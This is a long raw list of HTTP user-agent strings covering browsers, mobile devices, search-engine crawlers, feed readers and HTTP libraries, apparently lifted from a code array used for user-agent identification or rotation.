"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 (compatible; YandexScreenshotBot/3.0; +http://yandex.com/bots)"
"Mozilla/5.0 (compatible; Cloudflare-Smart-Transit/1.0; +https://www.cloudflare.com/",
"Mozilla/5.0 (compatible; CloudFlare-AlwaysOnline/1.0; +http://www.cloudflare.com/always-online) AppleWebKit/534.34",
"Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.5 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.4",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",
"Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)",
"Mozilla/5.0 (Linux; U; Android 5.1; zh-cn; Build/LMY47D ) AppleWebKit/534.30 (KHTML,like Gecko) Version/4.0 Chrome/50.0.0.0 Mobile Safari/534.30 GIONEE-GN9010/GN9010 RV/5.0.16",
"Mozilla/5.0 (compatible; Google-Site-Verification/1.0)",
"Dalvik/1.6.0 (Linux; U; Android 4.4.2; GT-I9190 Build/KOT49H)",
"Mozilla/5.0 (Linux; Android 4.4.2; DEXP Ixion ES2 4.5 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 YaBrowser/14.5.1847.18432.00 Mobile Safari/537.36",
"Mozilla/5.0 (Linux; U; Android 6.0; zh-cn; Build/MRA58K ) AppleWebKit/534.30 (KHTML,like Gecko) Version/4.0 Chrome/50.0.0.0 Mobile Safari/534.30 GIONEE-S9/S9 RV/5.0.17",
"VK/28 CFNetwork/711.4.6 Darwin/14.0.0",
"Instagram 8.2.0 (iPhone4,1; iPhone OS 8_4; ru_RU; ru; scale=2.00; 640x960) AppleWebKit/420+",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36",
"Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)"
"Mozilla/5.0 (compatible; vkShare; +vk.com/dev/Share)",
"Mozilla/5.0 (Windows Mobile 10; Android 8.0.0; Microsoft; Lumia 950XL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Mobile Safari/537.36 Edge/80.0.361.62"
"Mozilla/5.0 (Linux; Android 5.1.1) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Focus/2.3 Chrome/59.0.3071.125 Mobile Safari/537.36"
"Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N)"
"Mozilla/5.0 (X11; Linux aarch64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.84 Safari/537.36 CrKey/1.21a.76178",
"Sogou head spider/3.0( http://www.sogou.com/docs/help/webmasters.htm#07)",
"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0"
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.99 Safari/537.36 Vivaldi/2.9.1705.41",
"Mozilla/5.0 (Linux; Android 9; STF-L09 Build/HUAWEISTF-L09; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/79.0.3945.79 Mobile Safari/537.36 [Pinterest/Android]",
"Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 [FBAN/FBIOS;FBDV/iPhone9,1;FBMD/iPhone;FBSN/iOS;FBSV/13.3.1;FBSS/2;FBID/phone;FBLC/en_US;FBOP/5;FBCR/Verizon]",
"Mozilla/5.0 (iPhone; CPU iPhone OS 13_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 [FBAN/FBIOS;FBDV/iPhone9,3;FBMD/iPhone;FBSN/iOS;FBSV/13.3;FBSS/2;FBID/phone;FBLC/en_US;FBOP/5;FBCR/AT&T]",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36",
"WeatherReport/1.2.1 CFNetwork/485.12.7 Darwin/10.4.0",
"WeatherReport/1.2.2 CFNetwork/485.12.7 Darwin/10.4.0",
"Mozilla/5.0 (iPhone; CPU iPhone OS 12_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Mobile/15E148 Safari/604.1",
"Mozilla/5.0 (Linux; Android 4.2.2; Philips S388 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Mobile Safari/537.36 OPR/34.0.2044.98679"
"Mozilla/5.0 (compatible; Discordbot/2.0; +https://discordapp.com)"
"Googlebot/2.1 ( http://www.googlebot.com/bot.html)"
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36",
"APIs-Google (+https://developers.google.com/webmasters/APIs-Google.html)"
"Mozilla/5.0 (Linux; Android 4.4; Nexus 5 Build/_BuildID_) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36"
"Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16"
"Mozilla/5.0 (Linux; U; Android 2.3.1; en-us; MID Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; MID Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30 [FB_IAB/FB4A;FBAV/56.0.0.23.68;]",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.137 Safari/537.36 OPR/67.0.3575.79"
"Mozilla/5.0 (compatible; Bingbot/2.0; +http://www.bing.com/bingbot.htm)"
"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
"DuckDuckBot/1.0; (+http://duckduckgo.com/duckduckbot.html)"
"Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
"Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
"Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Exabot-Thumbnails"
"facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
"ia_archiver (+http://www.alexa.com/site/help/webmasters; [email protected])"
"Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/W.X.Y.Z‡ Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
"Mozilla/5.0 (Linux; Android 8.1.0; motorola one Build/OPKS28.63-18-3; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.80 Mobile Safari/537.36 Instagram 72.0.0.21.98 Android (27/8.1.0; 320dpi; 720x1362; motorola; motorola one; deen_sprout; qcom; pt_BR; 132081645)"
"Googlebot/2.1 (+http://www.google.com/bot.html)"
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
"Baiduspider ( http://www.baidu.com/search/spider.htm)",
"Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/Robots/2.0; +http://go.mail.ru/help/robots)"
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)"
"BlackBerry7100i/4.1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/103",
"BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/5.0.3.3 UP.Link/5.1.2.12 (Google WAP Proxy/1.0)",
"BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0",
"Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1",
"Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0",
"Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)",
"Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5",
"Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.5",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20",
"Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a",
"Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2",
"Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ",
"Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre",
"Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2",
"Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0",
"Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
"Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre",
"Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1",
"Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0",
"Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8",
"Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0",
"Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15",
"Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko",
"Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16",
"Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025",
"Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1",
"Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020",
"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1",
"Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)",
"Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8",
"BlackBerry8320/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/100",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)"
"BlackBerry8330/4.3.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/105",
"BlackBerry9000/4.6.0.167 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/102",
"BlackBerry9530/4.7.0.167 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/102 UP.Link/6.3.1.20.0",
"BlackBerry9700/5.0.0.351 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/123",
"Bloglines/3.1 (http://www.bloglines.com)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)"
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; InfoPath.1; SV1; .NET CLR 3.8.36217; WOW64; en-US)"
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; .NET CLR 2.7.58687; SLCC2; Media Center PC 5.0; Zune 3.4; Tablet PC 3.6; InfoPath.3)"
"CSSCheck/1.2.2",
"Dillo/2.0",
"DoCoMo/2.0 SH901iC(c100;TB;W24H12)",
"Download Demon/3.5.0.11",
"ELinks/0.12~pre5-4",
"11.50"
"PHP/7.1"
"Python-urllib/2.7"
"Rome"
"Tiny Tiny RSS/1.15.3 (http://tt-rss.org/)"
"Tiny Tiny RSS/17.12 (http://tt-rss.org/"
"ELinks (0.4pre5; Linux 2.6.10-ac7 i686; 80x33)",
"ELinks/0.9.3 (textmode; Linux 2.6.9-kanotix-8 i686; 127x41)",
"EmailWolf 1.00",
"everyfeed-spider/2.0 (http://www.everyfeed.com)",
"facebookscraper/1.0( http://www.facebook.com/sharescraper_help.php)",
"FAST-WebCrawler/3.8 (crawler at trd dot overture dot com; http://www.alltheweb.com/help/webmaster/crawler)",
"FeedFetcher-Google; ( http://www.google.com/feedfetcher.html)",
"Gaisbot/3.0 ([email protected]; http://gais.cs.ccu.edu.tw/robot.php)",
"Googlebot/2.1 ( http://www.googlebot.com/bot.html)",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
"Opera/5.0 (Ubuntu; U; Windows NT 6.1; es; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13"
"Opera/5.0 (SunOS 5.8 sun4u; U) [en]"
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
"Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
"Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
"Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:13.0) Gecko/20100101 Firefox/13.0.1",
"Mozilla/5.0 (iPhone; CPU iPhone OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
"Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6",
"Mozilla/5.0 (iPad; CPU OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11",
"Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
"Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02",
"Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
"Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.8 (build 4157); .NET CLR 2.0.50727; AskTbPTV/5.11.3.15590)",
"Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.5 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.4",
"Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1",
"Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1",
"Googlebot-Image/1.0",
"Googlebot-News",
"Googlebot-Video/1.0",
"Gregarius/0.5.2 ( http://devlog.gregarius.net/docs/ua)",
"grub-client-1.5.3; (grub-client-1.5.3; Crawl your own stuff with http://grub.org)",
"Gulper Web Bot 0.2.4 (www.ecsl.cs.sunysb.edu/~maxim/cgi-bin/Link/GulperBot)",
"HTC_Dream Mozilla/5.0 (Linux; U; Android 1.5; en-ca; Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"HTC-ST7377/1.59.502.3 (67150) Opera/9.50 (Windows NT 5.1; U; en) UP.Link/6.3.1.17.0",
"HTMLParser/1.6",
"iTunes/4.2 (Macintosh; U; PPC Mac OS X 10.2)",
"iTunes/9.0.2 (Windows; N)",
"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
"iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)",
"Java/1.6.0_13",
"Jigsaw/2.2.5 W3C_CSS_Validator_JFouffa/2.0",
"Konqueror/3.0-rc4; (Konqueror/3.0-rc4; i686 Linux;;datecode)",
